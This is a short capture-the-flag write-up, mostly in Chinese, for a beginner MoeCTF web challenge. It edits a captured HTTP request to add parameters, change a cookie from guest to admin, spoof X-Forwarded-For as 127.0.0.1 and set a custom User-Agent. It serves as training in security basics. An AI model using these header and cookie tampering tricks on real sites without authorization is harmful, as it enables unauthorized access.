[MoeCTF]http

this is GET method,

# your mission:

1.use parameter: UwU=u
2.post **form**: Luv=u
3.use admin character
4.request from 127.0.0.1
5.use browser 'MoeBrowser'
Complete All Missions

抓包：

GET / HTTP/1.1
Host: localhost:59172
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: character=guest
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1

发到repeater

根据任务要求

1.GET:UwU=u

2.POST:Luv=u

3.Cookie:character=admin

4.X-Forwarded-For: 127.0.0.1

5.User-Agent: MoeBrowser

修改后，得到：

POST /?UwU=u HTTP/1.1
Host: 127.0.0.1:59172
User-Agent: MoeBrowser
X-Forwarded-For: 127.0.0.1
Connection: close
Cookie: character=admin
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Content-Length: 5
Content-Type: application/x-www-form-urlencoded

Luv=u

具体解题过程：

1.GET / HTTP/1.1修改为GET /?UwU=u HTTP/1.1

或者在Params中添加一个Type：URL，Name：UwU，Value：u

2.GET /?UwU=u HTTP/1.1修改为POST /?UwU=u HTTP/1.1

在Params中添加一个Type：body，Name：Luv，Value：u

3.Cookie:character=guest修改为Cookie:character=admin

4.在User-Agent下面添加X-Forwarded-For: 127.0.0.1

它的具体作用为：告诉服务端请求的来源地址是 127.0.0.1。

5.将User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0修改为User-Agent: MoeBrowser

注：可用火狐的插件**hackbar v2**进行解题